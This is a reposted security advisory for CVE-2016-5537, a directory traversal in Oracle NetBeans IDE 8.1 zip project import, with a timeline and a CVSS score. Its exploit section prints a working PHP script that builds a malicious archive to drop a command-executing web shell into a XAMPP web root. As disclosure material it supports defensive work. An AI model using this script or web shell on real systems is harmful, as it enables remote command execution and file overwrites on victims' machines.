首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle Netbeans IDE 8.1 - Directory Traversal
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2016-10-21  

[+] Credits: John Page aka hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt

[+] ISR: ApparitionSec

 

Vendor:
===============
www.oracle.com

 

Product:
=================
Netbeans IDE v8.1

 

Vulnerability Type:
=========================
Import Directory Traversal 

 

CVE Reference:
==============
CVE-2016-5537

 

Vulnerability Details:
=====================

This was part of Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans.

Vulnerability in way Netbeans processes  ".zip" archives to be imported as project. If a user imports a malicious project
containing "../" characters the import will fail, yet still process the "../".  we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server etc...

It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.


References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW


Exploit Code(s):
=================

<?php
 #archive path traversal
 #target xampp htdocs as POC
 #by hyp3rlinx
 #===============================
 if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default? Y/[file]>";exit();}
 $zipname=$argv[1];
 $exploit_file="RCE.php";
 $cmd='<?php exec($_GET["cmd"]); ?>';
 if(!empty($argv[2])&&is_numeric($argv[2])){
 $depth=$argv[2];
 }else{
 echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
 exit();
 }
 if(strtolower($argv[3])!="y"){
 if(!empty($argv[3])){
 $exploit_file=$argv[3];
 }
 if(!empty($argv[4])){
 $cmd=$argv[4];
 }else{
 echo "Usage: enter a payload for file $exploit_file wrapped in double
 quotes";
 exit();
 }
 }
 $zip = new ZipArchive();
 $res = $zip->open("$zipname.zip", ZipArchive::CREATE);
 $zip->addFromString(str_repeat("..\\",
 $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
 $zip->close();
 echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
 echo "================ hyp3rlinx ===================";
?>


Disclosure Timeline:
=======================================
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure

 

Exploitation Technique:
=======================
Local

 

Severity Level:
=====================
CVSS VERSION 3.0 RISK
5.7

 

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hak5 WiFi Pineapple Preconfigu
·MiCasa VeraLite - Remote Code
·Hak5 WiFi Pineapple Preconfigu
·SAP NetWeaver KERNEL 7.0 < 7.5
·OpenNMS Java Object Unserializ
·Microsoft Edge - Array.map Hea
·Windows DeviceApi CMApi - User
·Microsoft Edge - Function.appl
·Windows DeviceApi CMApi PiCMOp
·Microsoft Edge - Array.join In
·Cgiemail 1.6 - Source Code Dis
·Microsoft Edge - Spread Operat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved